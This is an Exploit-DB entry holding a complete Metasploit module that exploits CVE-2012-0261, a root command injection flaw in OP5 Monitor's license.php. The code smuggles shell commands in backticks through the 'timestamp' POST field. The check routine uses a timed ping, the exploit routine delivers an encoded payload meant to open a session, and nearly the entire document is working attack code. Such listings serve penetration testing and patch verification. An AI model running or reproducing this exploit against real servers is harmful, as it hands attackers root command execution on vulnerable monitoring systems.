OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)

EDB-ID:

41686




Platform:

Multiple

Date:

2015-01-25


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OP5 license.php Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary root command execution vulnerability in the
        OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
        5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
      },
      'Author'     => [ 'Peter Osterberg <j[at]vel.nu>' ],
      'License'    => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2012-0261'],
          ['OSVDB', '78064'],
          ['URL', 'http://secunia.com/advisories/47417/'],
        ],
      'Privileged' => true,
      'Payload'    =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'BadChars'    => '`\\|',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'perl ruby python',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Jan 05 2012',
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptString.new('URI', [true, "The full URI path to license.php", "/license.php"]),
        ], self.class)
  end

  def check
    vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...")
    vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")

    # Try running/timing 'ping localhost' to determine is system is vulnerable
    start = Time.now

    data = 'timestamp=1317050333`ping -c 10 127.0.0.1`&action=install&install=Install';
    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI']),
      'method'  => 'POST',
      'proto'   => 'HTTPS',
      'data'    => data,
      'headers' =>
      {
        'Connection'     => 'close',
      }
    }, 25)
    elapsed = Time.now - start
    if elapsed >= 5
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}")

    data = 'timestamp=1317050333`' + payload.encoded + '`&action=install&install=Install';

    res = send_request_cgi({
      'uri'     => normalize_uri(datastore['URI']),
      'method'  => 'POST',
      'proto'   => 'HTTPS',
      'data'    => data,
      'headers' =>
      {
        'Connection'     => 'close',
      }
    }, 25)

    if(not res)
      if session_created?
        print_status("Session created, enjoy!")
      else
        print_error("No response from the server")
      end
      return
    end
  end
end